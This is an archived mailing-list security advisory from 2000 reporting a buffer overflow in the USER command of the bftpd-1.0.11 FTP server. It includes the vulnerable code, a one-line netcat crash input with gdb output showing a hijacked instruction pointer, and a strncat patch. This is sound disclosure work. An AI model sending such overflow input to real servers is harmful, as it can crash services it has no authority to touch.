Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Subject: Potential Security Problem in bftpd-1.0.11
From: BAILLEUX Christophe (cbGROLIER.FR)
Date: Fri Oct 27 2000 - 11:23:33 CDT

Subject : Potential security problem in bftpd (Buffer Overflow)
Author : Christophe BAILLEUX (cbgrolier.fr)
Plateforms : *nix
Test version : bftpd-1.0.11

I. Introduction

bftpd is a Linux FTP server with chroot and setreuid. Not all FTP commands
are included.
It accesses either the user's home directory or its.
ftp subdirectory, and user authentication is via passwd/shadow or PAM.

II. Problem

The lastest version of bftp has a potential security problem when
entering the USER command.
The problem is a potential Overflow Vulnerability when entering more 35
characteres in USER command.

III. Details/Demo

a) Code problem


   102 void command_user(char *username) {
   103 char *alias;
   104 char name[USERLEN + 7] = "ALIAS_";
   105 if(state) {
   106 fprintf(stderr, "503 Username already given.\r\n");
   107 return;
   108 }
   109 alias = (char *) config_getoption(strcat(name, username));
   110 if(alias[0] != '\0')

b) Demo / gdb output

tshaw:~$ printf "user `perl -e 'print"A"x37'`\n" | nc localhost 21

tshaw:/home/cb/bftpd-1.0.11# gdb /usr/sbin/bftpd 6613
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
This GDB was configured as "i386-slackware-linux"...
(no debugging symbols found)...
Attaching to program: /usr/sbin/bftpd, Pid 6624
Reading symbols from /lib/libcrypt.so.1...done.
Loaded symbols for /lib/libcrypt.so.1
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
0x400e7514 in read () from /lib/libc.so.6
(gdb) c

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x $esp
0xbffffcb8: 0x41414141

IV. Exploit

It's not possible to exploit it with a standart exploit...
commands.c contains a piece of code filtering non-writable chars, eg : NOP, shellcode...

   469 for(i = 0; i < strlen(str); i++) { /* Remove Internet Explorer
   470 if(str[i] < 32) {
   471 memmove((char *) ((int) str + i),
   472 (char *) ((int) str + i + 1),
   473 strlen(str) - i);
   474 i--; /* If junk is found, don't increment counter in next
loop. */
   475 }
   476 }

V. Workaround

In bftpd-1.0.11/commands.c

Modify the line 109

alias = (char *) config_getoption(strcat(name, username));


alias = (char *) config_getoption(strncat(name, username, USERLEN));

bftpd team has been informed.

VI. Greetings :)

Greetings to kalou, kli deda, Geudou deda and all DEDA TEAM!# :)
Thanks bdev for your help :)

Best regards,

BAILLEUX Christophe - Network & System Security Engineer
Grolier Interactive Europe-OG/CS
Voice:+33-(0)1-5545-4789 - mailto:cbgrolier.fr